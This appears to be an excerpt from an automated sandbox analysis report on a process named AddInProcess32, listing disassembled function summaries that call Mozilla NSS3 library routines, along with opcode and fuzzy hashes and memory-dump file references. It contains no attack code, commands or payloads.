                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$Item_$FreeZfree
                                                                                      • String ID:
                                                                                      • API String ID: 2046198998-0
                                                                                      • Opcode ID: 5e5866068f1791af5809c3484903288488c3e57fa1eaea81b0a62377c50d0d1f
                                                                                      • Instruction ID: cd5a7988b65899e0ae025bcb6bd090693a29eef3d403239a1635b7c24e33811e
                                                                                      • Opcode Fuzzy Hash: 5e5866068f1791af5809c3484903288488c3e57fa1eaea81b0a62377c50d0d1f
                                                                                      • Instruction Fuzzy Hash: 3E0184B210E200EFEB204F14F840B9673D8AF40759F21442DD59546FF0D771E444C665
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCE1EFC
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6CD5F7EC), ref: 6CCE1F17
                                                                                      • PORT_SetError_Util.NSS3(FFFFE023), ref: 6CCE1F33
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_$Equal_ErrorItems
                                                                                      • String ID:
                                                                                      • API String ID: 2432673894-0
                                                                                      • Opcode ID: 3adb1af71c0dab7a671f7ddb0b215305a3ebb62e7b7ad2e739f1ae99815f340a
                                                                                      • Instruction ID: 47261c862941a22db2b105b6f92c3db5a35cbfadc402a4e3cb5f0db930282c0b
                                                                                      • Opcode Fuzzy Hash: 3adb1af71c0dab7a671f7ddb0b215305a3ebb62e7b7ad2e739f1ae99815f340a
                                                                                      • Instruction Fuzzy Hash: 87F0B47360E21539DA1017ADBC41B97775D9F82339F640326F52888FF2EB21896485E1
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CD2AF7F
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000060,?), ref: 6CD2AF89
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000), ref: 6CD2AFC3
                                                                                        • Part of subcall function 6CD2946D: SECOID_SetAlgorithmID_Util.NSS3(00000000,0000001B,?,?,?,?,6CD2B26D,?,?,00000007,00000000,000000A8,00000000,00000000,?,6CD2A8C8), ref: 6CD29481
                                                                                      • PT_FPrintStats.NSS3(?,00000000), ref: 6CD2AFB8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$AlgorithmLockMark_PrintRelease_StatsUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 589149335-0
                                                                                      • Opcode ID: 4302cac71de6fb6d6a7de18451304a839ad4bec16ed35a37f21c1a46b1468371
                                                                                      • Instruction ID: 93d7c8b5f2fad446224b112dc9783fcd8cfb8108fcf74159bfa1fe79b5f6783a
                                                                                      • Opcode Fuzzy Hash: 4302cac71de6fb6d6a7de18451304a839ad4bec16ed35a37f21c1a46b1468371
                                                                                      • Instruction Fuzzy Hash: C5F022722086287ADB006B55AC40EEB73ADEF8115CF110021FA0493A10F76AE91447B8
                                                                                      APIs
                                                                                        • Part of subcall function 6CCECF49: PORT_SetError_Util.NSS3(FFFFE006,?,?), ref: 6CCECF71
                                                                                      • SGN_Begin.NSS3(00000000,?), ref: 6CCECF0B
                                                                                      • SGN_Update.NSS3(00000000,?,?,?), ref: 6CCECF1E
                                                                                      • SGN_End.NSS3(00000000,?,?,?,?), ref: 6CCECF30
                                                                                      • SGN_DestroyContext.NSS3(00000000,00000001,?), ref: 6CCECF3C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginContextDestroyError_UpdateUtil
                                                                                      • String ID:
                                                                                      • API String ID: 1877267941-0
                                                                                      • Opcode ID: 9aa94a4e349bb42d5163706be547806f0b9bffa241c38c275e1614c3b1823892
                                                                                      • Instruction ID: 8aa369a012b093e03cdaf7945f0abc6e485fd4727b5d0c2834708bfcffc44415
                                                                                      • Opcode Fuzzy Hash: 9aa94a4e349bb42d5163706be547806f0b9bffa241c38c275e1614c3b1823892
                                                                                      • Instruction Fuzzy Hash: B5F0F037048514778B122EAA6C019CE3F6AEF8F3B4B180125FD1846680FF3ACA2642D9
                                                                                      APIs
                                                                                      • PK11_AlgtagToMechanism.NSS3(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6CCFDE31
                                                                                        • Part of subcall function 6CD04F1E: SECOID_FindOIDByTag_Util.NSS3(00000000,?,6CCFDE36,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6CD04F24
                                                                                      • PK11_GetBestSlot.NSS3(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6CCFDE3C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,00000000,00000000,00000000,00000000,00000000,?), ref: 6CCFDE4F
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,00000000,81000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6CCFDE76
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_$SlotUtil$AlgtagBestErrorError_FindFreeMechanismTag_
                                                                                      • String ID:
                                                                                      • API String ID: 3671121426-0
                                                                                      • Opcode ID: f408acd25473851b9eaceeef21ad78c8ad59ee6c8748f50a2fc1a7150cab5b01
                                                                                      • Instruction ID: 735efb0e8db5eb01f4712a4cc6c3e26664d46263172cddcfbea9fcac1467083b
                                                                                      • Opcode Fuzzy Hash: f408acd25473851b9eaceeef21ad78c8ad59ee6c8748f50a2fc1a7150cab5b01
                                                                                      • Instruction Fuzzy Hash: 04F090719041187AC7006FAA6C80DDFBBBDDF811A8B54417AFC04E3B10E6354E1986F1
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,?,6CCE0366,00000000,?,?,00000000,?,6CCE0D2C,?,?,6CCE0B8D,?,?,?), ref: 6CCE0FD7
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000014,00000000,?,?,6CCE0366,00000000,?,?,00000000,?,6CCE0D2C,?,?,6CCE0B8D,?), ref: 6CCE0FE7
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,?,00000000,?,?,6CCE0366,00000000,?,?,00000000,?,6CCE0D2C,?,?,6CCE0B8D,?), ref: 6CCE1002
                                                                                        • Part of subcall function 6CD1C6C7: PR_Lock.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C6F4
                                                                                        • Part of subcall function 6CD1C6C7: PR_Unlock.NSS3(?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000,?,?,?), ref: 6CD1C732
                                                                                        • Part of subcall function 6CD1C6C7: PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C77B
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000001,00000000,?,?,6CCE0366,00000000,?,?,00000000,?,6CCE0D2C,?,?,6CCE0B8D,?), ref: 6CCE1013
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_Arena$Arena_Error$FreeLockUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 816549393-0
                                                                                      • Opcode ID: 5b29681226c6560aa691ed801ddfba510272b18af9156f58cd2754a5e1c05367
                                                                                      • Instruction ID: 7cc294e6b6c4dd5c6db2aaf91cdacca1f22dbf2f8e106a0024b2deb1236c2afd
                                                                                      • Opcode Fuzzy Hash: 5b29681226c6560aa691ed801ddfba510272b18af9156f58cd2754a5e1c05367
                                                                                      • Instruction Fuzzy Hash: 15F0E93730D7162AE214676D7800A8B2789DF8BAB8B204036F504D7E81FF65D41193F4
                                                                                      APIs
                                                                                        • Part of subcall function 6CCCFD32: TlsGetValue.KERNEL32(6CCD9945,?,6CCD3617,052030D0,00000000,?,6CCC80C2,NSPR_LOG_MODULES,?), ref: 6CCCFD38
                                                                                      • PR_SetError.NSS3(FFFFE89D,1C468901,00000000,?,?,6CCD0695,?), ref: 6CCD9CCB
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_Lock.NSS3(00000000,?,?,6CCD0695,?), ref: 6CCD9CE6
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_WaitCondVar.NSS3(1C468901,000000FF,?,?,6CCD0695,?), ref: 6CCD9CF0
                                                                                      • PR_Unlock.NSS3(?,?,6CCD0695,?), ref: 6CCD9D02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CondCriticalCurrentEnterErrorLockSectionThreadUnlockValueWait
                                                                                      • String ID:
                                                                                      • API String ID: 3260897647-0
                                                                                      • Opcode ID: 39156caaedf0cd32a1a65f1f511daac141a31eb13d39e2a840e6d1ce2ca2b546
                                                                                      • Instruction ID: fc63674fbf08f6283701f006497c2859f60d20d4b98c6e46fa13a54864634db2
                                                                                      • Opcode Fuzzy Hash: 39156caaedf0cd32a1a65f1f511daac141a31eb13d39e2a840e6d1ce2ca2b546
                                                                                      • Instruction Fuzzy Hash: D9F0F63A518111AADB106F25AC1088937F8FB83779737031EE36952AD0BF31B486C661
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,6CD2C9D0,10C483F8,?,6CD2CA5A,?,6CD2CA5A,?,00000000), ref: 6CD28F5F
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • SECOID_FindOIDTag_Util.NSS3(?,?,00000000,?,?,6CD2C9D0,10C483F8,?,6CD2CA5A,?,6CD2CA5A,?,00000000), ref: 6CD28F69
                                                                                        • Part of subcall function 6CD29121: SECOID_FindOID_Util.NSS3(?,?,6CD18C2D,?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD29127
                                                                                      • PT_FPrintStats.NSS3(?,00000000,?,?,?,6CD2CA5A,?,6CD2CA5A,?,00000000), ref: 6CD28F99
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000,6CD2CA5A,?,6CD2CA5A,?,00000000), ref: 6CD28FA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ArenaFind$LockMark_PrintRelease_StatsTag_Unlock
                                                                                      • String ID:
                                                                                      • API String ID: 3594159732-0
                                                                                      • Opcode ID: e2ecb6937b85bdceb3332c293972ec1340199055872c951893713402fe2395dc
                                                                                      • Instruction ID: 83e981d6ea132737018039f8c02864a70ddf13a05914ec28b4dffc42636233c9
                                                                                      • Opcode Fuzzy Hash: e2ecb6937b85bdceb3332c293972ec1340199055872c951893713402fe2395dc
                                                                                      • Instruction Fuzzy Hash: 06F030725082087FDF112F26DC40E9A3BAAEB813ACF104161FE1444A71EB36D9249675
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(8DC033AB,6CCF4FEA,?,?,6CD1186A,FFA0C9E8,00000001,?,?,6CD11D40,6CCF4FEA), ref: 6CD148CF
                                                                                      • PR_Unlock.NSS3(8DC033AB,?,6CD1186A,FFA0C9E8,00000001,?,?,6CD11D40,6CCF4FEA), ref: 6CD148E1
                                                                                      • PR_DestroyLock.NSS3(8DC033AB,?,?,6CD1186A,FFA0C9E8,00000001,?,?,6CD11D40,6CCF4FEA), ref: 6CD1490F
                                                                                      • PORT_FreeArena_Util.NSS3(6CCF4FEA,00000000,?,6CD1186A,FFA0C9E8,00000001,?,?,6CD11D40,6CCF4FEA), ref: 6CD14919
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock$Arena_DestroyFreeUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 187077488-0
                                                                                      • Opcode ID: af4d87feff3c4369158b01788b596a53f9348fc46580f9c38c5cfd29859ffb1e
                                                                                      • Instruction ID: 8b7306f3a6ef5e962e4fc95d4d2c11718a3f659c2de117246a0e5503d4e8772f
                                                                                      • Opcode Fuzzy Hash: af4d87feff3c4369158b01788b596a53f9348fc46580f9c38c5cfd29859ffb1e
                                                                                      • Instruction Fuzzy Hash: 6D018C32615519EFEF066F75EC09A49BBB8FF49329B14412AE64992D20E732B420DF90
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000,?,?,6CCC5E18,?,?), ref: 6CCCE9BA
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • _access.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000002,?,?,6CCC5E18,?,?), ref: 6CCCE9CD
                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CCC5E18,?,?), ref: 6CCCE9DB
                                                                                      • _access.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,?,6CCC5E18,?,?), ref: 6CCCE9F2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: _access$CurrentErrorThread_errno
                                                                                      • String ID:
                                                                                      • API String ID: 2708550572-0
                                                                                      • Opcode ID: d3c1ca0844b83a063d9a2ecefd7d5caa4d3fbec62e6ae3b09324949d61c8279f
                                                                                      • Instruction ID: c45444bc9e2e926ec771a3b2721431b9daf7a994524ded4a32f22dd82002b486
                                                                                      • Opcode Fuzzy Hash: d3c1ca0844b83a063d9a2ecefd7d5caa4d3fbec62e6ae3b09324949d61c8279f
                                                                                      • Instruction Fuzzy Hash: DBF0E03378861067E651197C9C077C83B54FB07779F204309F71596AF0EA61B841C1C6
                                                                                      APIs
                                                                                      • PK11_IsReadOnly.NSS3(?,?,6CCE7702,?), ref: 6CCE9D5D
                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C,?,?,6CCE7702,?), ref: 6CCE9D6F
                                                                                      • PORT_ZAlloc_Util.NSS3(00000010,?,?,6CCE7702,?), ref: 6CCE9D7D
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,6CCE7702,?), ref: 6CCE9D88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_$Free_K11_OnlyRead
                                                                                      • String ID:
                                                                                      • API String ID: 1768196905-0
                                                                                      • Opcode ID: caa3639b2be0f04576d7acacda2cb34c5b29930560264cc8d3eebd0f0423c141
                                                                                      • Instruction ID: 8b8c02963c1e04dbd8f765541e742cf6e632f0473fb0ea4a3af716993246a120
                                                                                      • Opcode Fuzzy Hash: caa3639b2be0f04576d7acacda2cb34c5b29930560264cc8d3eebd0f0423c141
                                                                                      • Instruction Fuzzy Hash: 98F05C3200A72625D614377DBC007CB7B698F433F8B20472AF4298AFE0FF60C44041A0
                                                                                      APIs
                                                                                      • PR_CallOnce.NSS3(6CD8A01C,6CD43DA2,?,6CD3F309,00000000,00000000,?), ref: 6CD43D1D
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001,00000000,00000000,?), ref: 6CD43D2E
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_RWLock_Rlock.NSS3(00000000,00000000,00000000,?), ref: 6CD43D40
                                                                                      • PR_RWLock_Unlock.NSS3 ref: 6CD43D52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock_$CallErrorError_OnceRlockUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 3900025529-0
                                                                                      • Opcode ID: 5394025dd82f6e60fb5efe2606772aab3de4963083fe4b31d9fdf399c38ada68
                                                                                      • Instruction ID: 4c4c25461004f04f4c97d7e944abe0cc0652c395e34b7ce95238fb9f6f5b2f52
                                                                                      • Opcode Fuzzy Hash: 5394025dd82f6e60fb5efe2606772aab3de4963083fe4b31d9fdf399c38ada68
                                                                                      • Instruction Fuzzy Hash: 7BF0273B206110AFFF011BA8EC05A853BBCDB07331B108022F71C87AF4DB329414DAA0
                                                                                      APIs
                                                                                      • SECMOD_GetReadLock.NSS3(?,?,6CD04CB8,00000000,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD14CC2
                                                                                      • SECMOD_ReferenceModule.NSS3(?,?,6CD04CB8,00000000,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD14CEB
                                                                                      • SECMOD_ReleaseReadLock.NSS3(?,6CD04CB8,00000000,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD14CF7
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,6CD04CB8,00000000,?,?,?,?,?,6CD04A77,00000000,?,?), ref: 6CD14D06
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockRead$Error_ModuleReferenceReleaseUtil
                                                                                      • String ID:
                                                                                      • API String ID: 858869203-0
                                                                                      • Opcode ID: 67c36a2cbdc442a4e997cc4885763b66c62c1e972c6d61c9de5239df49a38b45
                                                                                      • Instruction ID: cd4bb7c2dbd732e935cd246ffd2b7b43ba635825781fd631ebdb6a951fae6df6
                                                                                      • Opcode Fuzzy Hash: 67c36a2cbdc442a4e997cc4885763b66c62c1e972c6d61c9de5239df49a38b45
                                                                                      • Instruction Fuzzy Hash: 0CF0273230A121DBAB149B59F80189B376AAF4337C321015AF8049BF20DB24DC42C7E0
                                                                                      APIs
                                                                                      • PK11_KeyForCertExists.NSS3(?,?,?), ref: 6CCFBFE6
                                                                                        • Part of subcall function 6CCFC1CC: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?,?,?,?,?,?,?,6CCFBFEB,?,?,?), ref: 6CCFC1E6
                                                                                        • Part of subcall function 6CCFC1CC: SECITEM_FreeItem_Util.NSS3(00000000,00000001), ref: 6CCFC26D
                                                                                        • Part of subcall function 6CCFC1CC: PK11_FreeSlotList.NSS3(00000000,00000000,00000001), ref: 6CCFC273
                                                                                      • PK11_ImportCert.NSS3(00000000,?,?,?,00000000), ref: 6CCFC000
